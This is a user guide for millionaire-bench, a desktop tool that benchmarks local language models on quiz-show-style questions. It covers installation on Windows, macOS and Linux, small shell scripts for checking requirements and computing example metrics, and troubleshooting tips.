Welcome to the millionaire-bench project! This application allows you to test the performance of your local language models using fun questions from the popular game show "Who Wants to Be a Millionaire." It's designed for users who want a simple way to benchmark their models without needing any programming skills.
To get started, you need to download the application. You can find the latest release on our GitHub Releases page.
- Visit the millionaire-bench Releases page on GitHub to download.
- On the Releases page, you will see different versions of the software. Look for the most recent one.
- Find the appropriate file for your operating system (Windows, macOS, or Linux) and click it to download.
Before you install the application, make sure your system meets these requirements:
- Operating System: Windows 10/11, macOS 10.14 or higher, Linux (recent versions)
- RAM: At least 4 GB
- Processor: Intel i3 or equivalent
- Disk Space: 100 MB free space
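If you are comfortable with a terminal, the RAM and disk requirements above can be checked with a short script. This is an optional sketch, not part of millionaire-bench: the function names are made up for illustration, the RAM check reads /proc/meminfo and so only works on Linux, and the RAM threshold is set a little below 4096 MB on the assumption that a 4 GB machine reports slightly less than that as total memory.

```shell
#!/bin/sh
# Thresholds based on the requirements list above.
# Assumption: 3500 MB leaves slack for memory reserved by the system on a 4 GB machine.
MIN_RAM_MB=3500
MIN_DISK_MB=100

# meets_minimum ACTUAL REQUIRED: succeeds when ACTUAL >= REQUIRED.
meets_minimum() {
    [ "$1" -ge "$2" ]
}

# Total RAM in MB, read from /proc/meminfo (Linux only).
total_ram_mb() {
    awk '/^MemTotal:/ { print int($2 / 1024) }' /proc/meminfo
}

# Free space in MB on the filesystem that holds the given directory.
free_disk_mb() {
    df -Pk "$1" | awk 'NR == 2 { print int($4 / 1024) }'
}

# report LABEL ACTUAL REQUIRED: print a one-line verdict.
report() {
    if meets_minimum "$2" "$3"; then
        echo "$1: OK ($2 MB, need $3 MB)"
    else
        echo "$1: too low ($2 MB, need $3 MB)"
    fi
}

# Skip the RAM check on systems without /proc/meminfo (for example macOS).
if [ -r /proc/meminfo ]; then
    report "RAM" "$(total_ram_mb)" "$MIN_RAM_MB"
fi
report "Disk" "$(free_disk_mb "$HOME")" "$MIN_DISK_MB"
```

Save it under any name (for example check.sh, a hypothetical filename) and run it with sh check.sh. The processor requirement is not checked here.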
Once you have downloaded the file, follow these steps to run the application:
On Windows:
- Locate the downloaded file, usually in your "Downloads" folder.
- Double-click on the .exe file to start the installation process.
- Follow the prompts to complete the installation.
- After installation, you will find the "millionaire-bench" icon on your desktop. Double-click it to run.
On macOS:
- Find the downloaded .dmg file in your "Downloads" folder.
- Double-click to open it.
- Drag the "millionaire-bench" icon to your "Applications" folder.
- Open "Applications" and double-click "millionaire-bench" to run.
On Linux:
- Open a terminal window.
- Navigate to your "Downloads" folder using the cd command:
    cd ~/Downloads
- Make the downloaded file executable by running:
    chmod +x millionaire-bench
- Run the application with:
    ./millionaire-bench
Once you run the application, you'll see a simple interface. Here's how to get started with benchmarking your model:
- Load Your Model: Click on "Load Model" and select the language model you want to benchmark.
- Select Category: Choose a category of questions inspired by "Who Wants to Be a Millionaire." You can select from trivia, culture, or science.
- Start Benchmarking: Click the "Start Benchmark" button. The application will generate questions, and your model will respond. After completion, you will see a report detailing performance metrics such as response time and accuracy.
Once benchmarking finishes, the application shows a set of results. Here's what to look for:
- Response Time: This shows how quickly your model answered each question, usually measured in seconds.
- Accuracy: This shows how many questions your model answered correctly out of the total number asked.
- Overall Score: This combines response time and accuracy to give a single score, helping you compare performance.
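To make these metrics concrete, here is a small sketch of how such numbers could be computed by hand. The accuracy and mean response time calculations are standard arithmetic. The combined score formula is purely hypothetical: this README does not say how millionaire-bench weights response time against accuracy, so treat combined_score as an illustration only. All function names are invented for this example.

```shell
#!/bin/sh
# accuracy_percent CORRECT TOTAL: share of correct answers as a percentage.
accuracy_percent() {
    awk -v c="$1" -v t="$2" 'BEGIN {
        if (t > 0) printf "%.1f\n", 100 * c / t
        else print "0.0"
    }'
}

# mean_seconds T1 T2 ...: average of the given response times in seconds.
mean_seconds() {
    printf '%s\n' "$@" | awk '{ sum += $1 } END { printf "%.2f\n", sum / NR }'
}

# HYPOTHETICAL combined score (not the application's actual formula):
# accuracy divided by (1 + mean seconds), so slower answers lower the score.
combined_score() {
    awk -v a="$1" -v s="$2" 'BEGIN { printf "%.1f\n", a / (1 + s) }'
}

# Example: 12 of 15 questions correct, with three sample response times.
acc=$(accuracy_percent 12 15)
avg=$(mean_seconds 1.2 0.8 2.0)
echo "Accuracy: $acc%"
echo "Mean response time: $avg s"
echo "Combined score (illustrative): $(combined_score "$acc" "$avg")"
```

With 12 correct answers out of 15, the accuracy works out to 80.0%. Any single score that mixes speed and accuracy depends on the weighting chosen, so compare overall scores only between runs produced by the same tool.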
If you encounter any issues while using the application, here are some common troubleshooting tips:
- Application Won't Open: Ensure your system meets the necessary requirements. Sometimes, your operating system may block applications from unverified developers. Check your security settings and allow the application.
- Performance Issues: If your model is slow or unresponsive, it may require more resources. Try closing other applications to free up memory.
- Question Generation Errors: Restart the application if it fails to generate questions. Make sure your model is correctly loaded.
If you need further assistance, please reach out through the Issues page on our GitHub repository. We are here to help you.
Thank you for using millionaire-bench! Happy benchmarking!